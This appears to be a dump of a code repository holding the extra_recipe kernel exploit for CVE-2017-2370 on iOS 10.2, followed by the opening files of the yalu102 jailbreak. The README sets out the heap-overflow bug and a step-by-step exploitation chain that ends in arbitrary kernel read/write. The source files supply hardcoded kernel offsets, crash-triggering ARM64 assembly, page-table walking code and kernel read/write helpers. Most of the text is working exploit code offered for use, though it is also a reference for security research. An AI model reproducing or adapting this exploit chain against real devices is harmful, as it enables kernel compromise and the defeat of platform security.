CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/README: -------------------------------------------------------------------------------- 1 | // ianbeer 2 | 3 | kernel arbitrary read/write exploit for CVE-2017-2370 for iOS 10.2 4 | 5 | Only tested on iPod Touch 6G 14C92 - other devices/firmwares will not work out of the box! 6 | 7 | *** the bug *** 8 | mach_voucher_extract_attr_recipe_trap is a mach trap which can be called from any context. It's brand new code, added in iOS 10. 9 | 10 | kern_return_t 11 | mach_voucher_extract_attr_recipe_trap(struct mach_voucher_extract_attr_recipe_args *args) 12 | { 13 | ipc_voucher_t voucher = IV_NULL; 14 | kern_return_t kr = KERN_SUCCESS; 15 | mach_msg_type_number_t sz = 0; 16 | 17 | if (copyin(args->recipe_size, (void *)&sz, sizeof(sz))) <---------- (a) 18 | return KERN_MEMORY_ERROR; 19 | 20 | if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE) 21 | return MIG_ARRAY_TOO_LARGE; 22 | 23 | voucher = convert_port_name_to_voucher(args->voucher_name); 24 | if (voucher == IV_NULL) 25 | return MACH_SEND_INVALID_DEST; 26 | 27 | mach_msg_type_number_t __assert_only max_sz = sz; 28 | 29 | if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) { 30 | /* keep small recipes on the stack for speed */ 31 | uint8_t krecipe[sz]; 32 | if (copyin(args->recipe, (void *)krecipe, sz)) { 33 | kr = KERN_MEMORY_ERROR; 34 | goto done; 35 | } 36 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 37 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 38 | assert(sz <= max_sz); 39 | 40 | if (kr == KERN_SUCCESS && sz > 0) 41 | kr = copyout(krecipe, (void *)args->recipe, sz); 42 | } else { 43 | uint8_t *krecipe = kalloc((vm_size_t)sz); <---------- (b) 44 | if (!krecipe) { 45 | kr = KERN_RESOURCE_SHORTAGE; 46 | goto done; 47 | } 48 | 49 | if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) { <----------- (c) 50 | kfree(krecipe, (vm_size_t)sz); 51 | kr = KERN_MEMORY_ERROR; 52 | goto done; 53 | } 54 | 55 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 56 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 57 | assert(sz <= max_sz); 58 | 59 | if (kr == KERN_SUCCESS && sz > 0) 60 | kr = copyout(krecipe, (void *)args->recipe, sz); 61 | kfree(krecipe, (vm_size_t)sz); 62 | } 63 | 64 | kr = copyout(&sz, args->recipe_size, sizeof(sz)); 65 | 66 | done: 67 | ipc_voucher_release(voucher); 68 | return kr; 69 | } 70 | 71 | 72 | Here's the argument structure (controlled from userspace) 73 | 74 | struct mach_voucher_extract_attr_recipe_args { 75 | PAD_ARG_(mach_port_name_t, voucher_name); 76 | PAD_ARG_(mach_voucher_attr_key_t, key); 77 | PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe); 78 | PAD_ARG_(user_addr_t, recipe_size); 79 | }; 80 | 81 | recipe and recipe_size are userspace pointers. 82 | 83 | At point (a) four bytes are read from the userspace pointer recipe_size into sz. 84 | 85 | At point (b) if sz was less than MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) and greater than MACH_VOUCHER_TRAP_STACK_LIMIT (256) 86 | sz is used to allocate a kernel heap buffer. 87 | 88 | At point (c) copyin is called again to copy userspace memory into that buffer which was just allocated, but rather than passing sz (the 89 | validate size which was allocated) args->recipe_size is passed as the size. This is the userspace pointer *to* the size, not the size! 90 | 91 | This leads to a completely controlled kernel heap overflow. Note that the code actually can't work properly :) 92 | 93 | *** the exploit *** 94 | 95 | I target preallocated mach message buffers which are allocated via kalloc. The first 4 bytes are a size field which is used to determine 96 | where in the buffer to read and write a message. By corrupting this field we can cause mach messages to be read and written outside the bounds of 97 | the kalloc allocation backing the kmsg. 98 | 99 | There is a slight complication in that a port's preallocated kmsg will only be used for actual mach_msg sends by the kernel (not for replies 100 | to MIG methods for example.) This makes it a bit trickier to get enough controlled content in them. 101 | 102 | One type of mach message which the kernel sends with a lot of user-controlled data is an exception message, sent when a thread crashes. 103 | 104 | The file load_regs_and_crash.s contains ARM64 assembly which loads the ARM64 general purpose registers with the contents of a buffer 105 | such that when it crashes the exception message contains that data buffer (about 0x70 bytes are controlled.) 106 | 107 | By overwriting the port's ikm_size field to point to the header of another port we can read and write another port's header and learn where it is 108 | in memory. We can then free that second port and reallocate a user client in its place which we can also read and write. 109 | 110 | I read the userclients vtable pointer then use the OSSerializer::serialize gadget technique as detailed in 111 | [https://info.lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf] to call an arbitrary function with two controlled arguments. 112 | 113 | I call uuid_copy which calls memmove(arg0, arg1, 0x10). By pointing either arg0 or arg1 into the userclient itself (which we can read by receiving the 114 | exception message) we can read and write arbitrary kernel memory in 16 byte chunks. 115 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/ViewController.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.swift 3 | // extra_recipe 4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 7 | // 8 | 9 | import UIKit 10 | 11 | class ViewController: UIViewController { 12 | 13 | override func viewDidLoad() { 14 | super.viewDidLoad() 15 | //DispatchQueue.main.async(execute: { () -> Void in 16 | // jb_go(); 17 | //}) 18 | } 19 | 20 | 21 | override func didReceiveMemoryWarning() { 22 | super.didReceiveMemoryWarning() 23 | // Dispose of any resources that can be recreated. 24 | } 25 | 26 | @IBAction func bang(_ sender: UIButton) { 27 | var status: String 28 | switch jb_go() { 29 | case 0: 30 | status = "jailbroken" 31 | case 1: 32 | status = "internal error" 33 | case 2: 34 | status = "unsupported" 35 | case 3: 36 | status = "unsupported yet" 37 | case 42: 38 | status = "hmm... ok" 39 | default: 40 | status = "failed, reboot" 41 | } 42 | sender.isEnabled = false 43 | sender.setTitle(status, for: .disabled) 44 | } 45 | 46 | } 47 | 48 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/bootstrap.tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/def.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/def.plist -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/extra_recipe-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 3 | // 4 | 5 | int jb_go(); 6 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/launchctl -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/load_regs_and_crash.s: -------------------------------------------------------------------------------- 1 | .text 2 | .globl _load_regs_and_crash 3 | .align 2 4 | _load_regs_and_crash: 5 | mov x30, x0 6 | ldp x0, x1, [x30, 0] 7 | ldp x2, x3, [x30, 0x10] 8 | ldp x4, x5, [x30, 0x20] 9 | ldp x6, x7, [x30, 0x30] 10 | ldp x8, x9, [x30, 0x40] 11 | ldp x10, x11, [x30, 0x50] 12 | ldp x12, x13, [x30, 0x60] 13 | ldp x14, x15, [x30, 0x70] 14 | ldp x16, x17, [x30, 0x80] 15 | ldp x18, x19, [x30, 0x90] 16 | ldp x20, x21, [x30, 0xa0] 17 | ldp x22, x23, [x30, 0xb0] 18 | ldp x24, x25, [x30, 0xc0] 19 | ldp x26, x27, [x30, 0xd0] 20 | ldp x28, x29, [x30, 0xe0] 21 | brk 0 22 | .align 3 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/mach-portal.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/mach-portal.dylib -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/mach_portal.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/mach_portal.dylib -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/offsets.h: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #ifndef offsets_h 10 | #define offsets_h 11 | 12 | #define CS_VALID 0x0000001 /* dynamically valid */ 13 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 14 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 15 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 16 | 17 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 18 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 19 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 20 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 21 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 22 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 23 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 24 | 25 | #define CS_ALLOWED_MACHO 0x00ffffe 26 | 27 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 28 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 29 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 30 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 31 | 32 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 33 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 34 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 35 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 36 | 37 | enum { 38 | ERR_NOERR = 0, 39 | ERR_INTERNAL = 1, 40 | ERR_UNSUPPORTED = 2, 41 | ERR_UNSUPPORTED_YET = 3, 42 | }; 43 | 44 | extern unsigned offsetof_p_pid; 45 | extern unsigned offsetof_task; 46 | extern unsigned offsetof_p_ucred; 47 | extern unsigned offsetof_p_csflags; 48 | extern unsigned offsetof_itk_self; 49 | extern unsigned offsetof_itk_sself; 50 | extern unsigned offsetof_itk_bootstrap; 51 | extern unsigned offsetof_ip_mscount; 52 | extern unsigned offsetof_ip_srights; 53 | extern unsigned offsetof_special; 54 | 55 | extern const char *mp; 56 | 57 | extern uint64_t AGXCommandQueue_vtable; 58 | extern uint64_t OSData_getMetaClass; // +8 == ret 59 | extern uint64_t OSSerializer_serialize; 60 | extern uint64_t k_uuid_copy; 61 | 62 | extern uint64_t allproc; 63 | extern uint64_t realhost; 64 | extern uint64_t call5; 65 | 66 | extern int nports; 67 | 68 | int init_offsets(void); 69 | uint64_t constget(int idx); 70 | 71 | #endif /* offsets_h */ 72 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/offsets.m: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.m 3 | // extra_recipe 4 | // 5 | // Created by xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | #include "offsets.h" 13 | 14 | unsigned offsetof_p_pid = 0x10; // proc_t::p_pid 15 | unsigned offsetof_task = 0x18; // proc_t::task 16 | unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred 17 | unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags 18 | unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port) 19 | unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port) 20 | unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port) 21 | unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send) 22 | unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send) 23 | unsigned offsetof_special = 2 * sizeof(long); // host::special 24 | 25 | const char *mp = NULL; 26 | 27 | uint64_t AGXCommandQueue_vtable = 0; 28 | uint64_t OSData_getMetaClass = 0; 29 | uint64_t OSSerializer_serialize = 0; 30 | uint64_t k_uuid_copy = 0; 31 | 32 | uint64_t allproc = 0; 33 | uint64_t realhost = 0; 34 | uint64_t call5 = 0; 35 | 36 | int nports = 40000; 37 | 38 | static NSMutableArray *consttable = nil; 39 | static NSMutableArray *collide = nil; 40 | 41 | static int 42 | constload(void) 43 | { 44 | struct utsname uts; 45 | uname(&uts); 46 | if (strstr(uts.version, "Marijuan")) { 47 | return -2; 48 | } 49 | 50 | NSString *strv = [NSString stringWithUTF8String:uts.version]; 51 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 52 | int m = 0; 53 | collide = [NSMutableArray new]; 54 | 55 | for (NSDictionary *dict in dp) { 56 | if ([dict[@"vers"] isEqualToString:strv]) { 57 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 58 | int i = 0; 59 | for (NSString *str in dict[@"val"]) { 60 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 61 | i++; 62 | } 63 | m++; 64 | } 65 | } 66 | if (m) { 67 | return 0; 68 | } 69 | return -1; 70 | } 71 | 72 | static char 73 | affine_const_by_surfacevt(uint64_t surfacevt_slid) 74 | { 75 | for (NSArray *arr in collide) { 76 | if ((surfacevt_slid & 0xfffff) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 77 | NSLog(@"affined"); 78 | consttable = arr; 79 | return 0; 80 | } 81 | } 82 | return -1; 83 | } 84 | 85 | uint64_t 86 | constget(int idx) 87 | { 88 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 89 | } 90 | 91 | static int 92 | offload(const char *hw, NSString *ios) 93 | { 94 | NSArray *dp = [[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"dex" ofType:@"plist"]]; 95 | for (NSDictionary *dict in dp) { 96 | NSArray *hw_array = dict[@"hw"]; 97 | for (NSString *h in hw_array) { 98 | if (!strcmp([h UTF8String], hw)) { 99 | NSArray *ios_array = dict[@"ios"]; 100 | for (NSString *i in ios_array) { 101 | if ([ios compare:i] == NSOrderedSame) { 102 | NSArray *a = dict[@"offsets"]; 103 | AGXCommandQueue_vtable = strtoull([[a objectAtIndex:0] UTF8String], NULL, 0); 104 | OSData_getMetaClass = strtoull([[a objectAtIndex:1] UTF8String], NULL, 0); 105 | OSSerializer_serialize = strtoull([[a objectAtIndex:2] UTF8String], NULL, 0); 106 | k_uuid_copy = strtoull([[a objectAtIndex:3] UTF8String], NULL, 0); 107 | allproc = strtoull([[a objectAtIndex:4] UTF8String], NULL, 0); 108 | realhost = strtoull([[a objectAtIndex:5] UTF8String], NULL, 0); 109 | call5 = strtoull([[a objectAtIndex:6] UTF8String], NULL, 0); 110 | NSNumber *np = dict[@"nports"]; 111 | if (np) { 112 | nports = [np intValue]; 113 | } 114 | return 0; 115 | } 116 | } 117 | } 118 | } 119 | } 120 | return -1; 121 | } 122 | 123 | int 124 | init_offsets(void) 125 | { 126 | struct utsname uts; 127 | 128 | if (uname(&uts)) { 129 | return ERR_INTERNAL; 130 | } 131 | 132 | NSString *version = [[UIDevice currentDevice] systemVersion]; 133 | // Supported versions : 10.0 ~ 10.2 134 | if ([version compare:@"10.0" options:NSNumericSearch] == NSOrderedAscending || 135 | [version compare:@"10.2" options:NSNumericSearch] == NSOrderedDescending) { 136 | return ERR_UNSUPPORTED; 137 | } 138 | 139 | if (!strncmp(uts.machine, "iPhone9,", sizeof("iPhone9"))) { 140 | // iPhone 7 (plus) 141 | // not supported cause of SMAP 142 | if (constload() || affine_const_by_surfacevt(0xfffffff006e521e0)) { 143 | return ERR_INTERNAL; 144 | } 145 | if ([version compare:@"10.1" options:NSNumericSearch] == NSOrderedAscending) { 146 | // 10.0[.x] 147 | mp = "@executable_path/mach-portal.dylib"; 148 | } else { 149 | // 10.1[.x] 150 | mp = "@executable_path/mach_portal.dylib"; 151 | } 152 | } 153 | 154 | if (offload(uts.machine, version) || !AGXCommandQueue_vtable) { 155 | return ERR_UNSUPPORTED_YET; 156 | } 157 | 158 | return 0; 159 | } 160 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/patchfinder64.h: -------------------------------------------------------------------------------- 1 | #ifndef PATCHFINDER64_H_ 2 | #define PATCHFINDER64_H_ 3 | 4 | int init_kernel(uint64_t base, const char *filename); 5 | void term_kernel(void); 6 | 7 | enum { SearchInCore, SearchInPrelink }; 8 | 9 | uint64_t find_register_value(uint64_t where, int reg); 10 | uint64_t find_reference(uint64_t to, int n, int prelink); 11 | uint64_t find_strref(const char *string, int n, int prelink); 12 | uint64_t find_gPhysBase(void); 13 | uint64_t find_kernel_pmap(void); 14 | uint64_t find_amfiret(void); 15 | uint64_t find_ret_0(void); 16 | uint64_t find_amfi_memcmpstub(void); 17 | uint64_t find_sbops(void); 18 | uint64_t find_lwvm_mapio_patch(void); 19 | uint64_t find_lwvm_mapio_newj(void); 20 | 21 | uint64_t find_entry(void); 22 | const unsigned char *find_mh(void); 23 | 24 | uint64_t find_cpacr_write(void); 25 | uint64_t find_str(const char *string); 26 | uint64_t find_amfiops(void); 27 | uint64_t find_sysbootnonce(void); 28 | 29 | #endif 30 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | // Translation Table Entry format 30 | typedef union VMA_4K { 31 | struct { 32 | uint64_t block_off : 12; 33 | uint64_t level3_index : 9; 34 | uint64_t level2_index : 9; 35 | uint64_t level1_index : 9; 36 | uint64_t level0_index : 9; 37 | uint64_t ttbr_selector : 16; // Let's not really care about the upper attributes 38 | } __attribute__((packed)) vm_info; 39 | uint64_t vmaddr; 40 | } VMA_4K; 41 | typedef union VMA_16K { 42 | struct { 43 | uint64_t block_off : 14; 44 | uint64_t level3_index : 11; 45 | uint64_t level2_index : 11; 46 | uint64_t level1_index : 11; 47 | uint64_t level0_index : 1; 48 | uint64_t ttbr_selector : 16; 49 | } __attribute__((packed)) vm_info; 50 | uint64_t vmaddr; 51 | } VMA_16K; 52 | 53 | VMA_16K vad16; 54 | VMA_4K vad4; 55 | char isvad = 0; 56 | 57 | #define TTELog NSLog 58 | vm_size_t sz = 0; 59 | 60 | // Check if it's using 'Small pages(4K)'. If so, then the page table structs are slightly different, and there is one more level to walk through 61 | void checkvad() { 62 | if (!sz) { 63 | struct utsname u = { 0 }; 64 | uname(&u); 65 | host_page_size(mach_host_self(), &sz); 66 | NSLog(@"checkvad: %x %x", sz, getpagesize()); 67 | if (strstr(u.machine, "iPad5,") == u.machine) { 68 | sz = 4096; // this is 4k but host_page_size lies to us 69 | } 70 | assert(sz); 71 | if (sz == 4096) { 72 | isvad = 1; 73 | } 74 | } 75 | } 76 | 77 | // Debug function 78 | void parse_block_tte(uint64_t tte) { 79 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 80 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 81 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 82 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 83 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 84 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 85 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 86 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 87 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 88 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 89 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 90 | } 91 | 92 | // Walk the page table 93 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 94 | 95 | // Sets the 'isvad' var 96 | checkvad(); 97 | if (!table) table = level1_table; 98 | if (!level) level = 1; 99 | 100 | vm_address_t tteaddr = 0; 101 | 102 | 103 | 104 | if (sz == 4096) { 105 | VMA_4K target_addr; 106 | target_addr.vmaddr = vmaddr; 107 | 108 | if (level == 1) { 109 | // In the case of 4K pages, the L1 table index starts from index 0x1C0 for some odd reason...?? 110 | target_addr.vm_info.level1_index -= 0x1c0; 111 | } 112 | 113 | // Calculating the Translation Table Entry's address. The same logic can be applied to all levels 114 | switch (level) { 115 | case 0: 116 | tteaddr = table + TTE_INDEX(target_addr, level0); 117 | break; 118 | case 1: 119 | tteaddr = table + TTE_INDEX(target_addr, level1); 120 | break; 121 | 122 | case 2: 123 | tteaddr = table + TTE_INDEX(target_addr, level2); 124 | break; 125 | 126 | case 3: 127 | tteaddr = table + TTE_INDEX(target_addr, level3); 128 | break; 129 | 130 | default: 131 | break; 132 | } 133 | 134 | } else if (sz == 4096*4) { 135 | VMA_16K target_addr; 136 | target_addr.vmaddr = vmaddr; 137 | 138 | // Doing the same thing as above. This time, there is no wierd subtracting compensation going on here 139 | switch (level) { 140 | case 0: 141 | tteaddr = table + TTE_INDEX(target_addr, level0); 142 | break; 143 | case 1: 144 | tteaddr = table + TTE_INDEX(target_addr, level1); 145 | break; 146 | 147 | case 2: 148 | tteaddr = table + TTE_INDEX(target_addr, level2); 149 | break; 150 | 151 | case 3: 152 | tteaddr = table + TTE_INDEX(target_addr, level3); 153 | break; 154 | 155 | default: 156 | break; 157 | } 158 | 159 | 160 | } 161 | 162 | // Uncomment this if you want to see that the code is working properly 163 | //parse_block_tte(level1_entry); 164 | 165 | pagestuff_64_callback(tteaddr, level); 166 | 167 | // Read the Translation Table Entry 168 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 169 | 170 | // Is it the last level? Stop the table walk? 171 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 172 | // Walk until the last level of page tables(L3) 173 | // According to the ARMv8 reference manual, if the Page uses 16K granule, then 'TTE_PHYS_VALUE_MASK' should be 0xFFFFFFFFC000ULL. 174 | // Apparantly, that is not the case for iOS CPUs it seems 175 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 176 | } 177 | } 178 | 179 | // Return the start of the physical page address, where the virtual address lies in 180 | uint64_t findphys_real(uint64_t virtaddr) { 181 | __block uint64_t physvar = 0; 182 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 183 | uint64_t tte = ReadAnywhere64(tte_addr); 184 | // If it's the last level, then save the Physical address(Page Frame) of the Virtual Address into the return var 185 | if (addr == 3) {\ 186 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 187 | } 188 | }, level1_table, isvad ? 1 : 2); 189 | 190 | // As seen in the above logic, the offset of the VMA isn't taken into account. Consequently, this function returns the beginning of the physical page where the VMA resides in 191 | return physvar; 192 | 193 | } 194 | 195 | // Allocates memory that lives in the kernel in the form of a VA 196 | uint64_t physalloc(uint64_t size) { 197 | uint64_t ret = 0; 198 | // Uses the kernel task port 199 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 200 | return ret; 201 | } 202 | 203 | #endif 204 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe/tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/unjail.h: -------------------------------------------------------------------------------- 1 | // 2 | // unjail.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 16/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #ifndef unjail_h 10 | #define unjail_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | extern mach_port_t tfp0; 25 | extern uint64_t kaslr_shift; 26 | extern uint64_t kernel_base; 27 | 28 | size_t kread(uint64_t where, void *p, size_t size); 29 | uint64_t kread_uint64(uint64_t where); 30 | uint32_t kread_uint32(uint64_t where); 31 | size_t kwrite(uint64_t where, const void *p, size_t size); 32 | size_t kwrite_uint64(uint64_t where, uint64_t value); 33 | size_t kwrite_uint32(uint64_t where, uint32_t value); 34 | 35 | void kx2(uint64_t fptr, uint64_t arg1, uint64_t arg2); 36 | uint32_t kx5(uint64_t fptr, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t arg4, uint64_t arg5); 37 | 38 | #endif /* unjail_h */ 39 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | This is not a support forum or generic mailing list. 2 | 3 | This form is exclusively for reporting issues caused directly by the inner workings of yalu. 4 | 5 | Direct your jailbreaking questions to one of these fine communities: 6 | 7 | * https://reddit.com/r/jailbreak 8 | * http://www.jailbreakqa.com/ 9 | 10 | Issues, which are not related to yalu's code, may be closed without comment. Do NOT post about: Cydia, tweak, respring/bootloop or app issues UNLESS you have evidence that they are caused by an error in the jailbreaking software itself. 11 | 12 | (Delete this bit after reading, and replace it by "I read the issue posting guidelines.") 13 | -------------------------------------------------------------------------------- /extra_recipe/yalu102-master/.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 